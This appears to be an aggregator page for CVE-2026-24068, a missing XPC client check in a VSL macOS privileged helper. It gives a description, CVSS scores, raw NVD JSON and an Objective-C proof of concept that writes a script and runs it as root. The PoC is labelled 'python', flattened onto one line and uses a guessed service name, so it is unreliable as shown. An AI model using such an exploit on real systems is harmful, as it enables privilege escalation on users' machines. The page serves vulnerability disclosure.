Security Vulnerability Report
中文
CVE-2026-24068 CVSS 8.8 HIGH

CVE-2026-24068

Published: 2026-03-26 11:16:20
Last Modified: 2026-04-03 06:16:06
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

The VSL privileged helper does utilize NSXPC for IPC. The implementation of the "shouldAcceptNewConnection" function, which is used by the NSXPC framework to validate if a client should be allowed to connect to the XPC listener, does not validate clients at all. This means that any process can connect to this service using the configured protocol. A malicious process is able to call all the functions defined in the corresponding HelperToolProtocol. No validation is performed in the functions "writeReceiptFile" and “runUninstaller” of the HelperToolProtocol. This allows an attacker to write files to any location with any data as well as execute any file with any arguments. Any process can call these functions because of the missing XPC client validation described before. The abuse of the missing endpoint validation leads to privilege escalation.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

VSL 所有受影响版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Conceptual PoC for CVE-2026-24068 // This demonstrates how an attacker might interact with the vulnerable XPC service. #import <Foundation/Foundation.h> // Define the protocol based on the vulnerability description @protocol HelperToolProtocol - (void)writeReceiptFile:(NSString *)path data:(NSData *)data; - (void)runUninstaller:(NSString *)path arguments:(NSArray<NSString *> *)args; @end int main(int argc, const char * argv[]) { @autoreleasepool { // 1. Connect to the vulnerable XPC service // Assuming the service name is com.vsl.helper (hypothetical) NSXPCConnection *connection = [[NSXPCConnection alloc] initWithServiceName:@"com.vsl.helper"]; connection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)]; [connection resume]; id<HelperToolProtocol> helper = connection.remoteObjectProxy; // 2. Write a malicious payload (e.g., a shell script) to an arbitrary location NSString *payloadPath = @"/tmp/malicious_update.sh"; NSString *scriptContent = @"#!/bin/bash\n/usr/bin/touch /tmp/pwned\n"; NSData *payloadData = [scriptContent dataUsingEncoding:NSUTF8StringEncoding]; [helper writeReceiptFile:payloadPath data:payloadData]; // 3. Execute the payload with root privileges using runUninstaller // Note: Exploitation depends on the exact method signature and behavior [helper runUninstaller:@"/bin/bash" arguments:@[payloadPath]]; NSLog(@"Exploit attempt sent."); // Clean up [connection invalidate]; } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24068", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2026-03-26T11:16:20.097", "lastModified": "2026-04-03T06:16:06.463", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VSL privileged helper does utilize NSXPC for IPC. The implementation of the \"shouldAcceptNewConnection\" function, which is used by the NSXPC framework to validate if a client should be allowed to connect to the XPC listener, does not validate clients at all. This means that any process can connect to this service using the configured protocol. A malicious process is able to call all the functions defined in the corresponding HelperToolProtocol. No validation is performed in the functions \"writeReceiptFile\" and “runUninstaller” of the HelperToolProtocol. This allows an attacker to write files to any location with any data as well as execute any file with any arguments. Any process can call these functions because of the missing XPC client validation described before. The abuse of the missing endpoint validation leads to privilege escalation."}, {"lang": "es", "value": "El asistente privilegiado de VSL utiliza NSXPC para IPC. La implementación de la función 'shouldAcceptNewConnection', que es utilizada por el framework NSXPC para validar si a un cliente se le debe permitir conectarse al oyente XPC, no valida a los clientes en absoluto. Esto significa que cualquier proceso puede conectarse a este servicio utilizando el protocolo configurado. Un proceso malicioso puede llamar a todas las funciones definidas en el HelperToolProtocol correspondiente. No se realiza ninguna validación en las funciones 'writeReceiptFile' y 'runUninstaller' del HelperToolProtocol. Esto permite a un atacante escribir archivos en cualquier ubicación con cualquier dato, así como ejecutar cualquier archivo con cualquier argumento. Cualquier proceso puede llamar a estas funciones debido a la falta de validación del cliente XPC descrita anteriormente. El abuso de la falta de validación del endpoint conduce a la escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://r.sec-consult.com/vsl", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.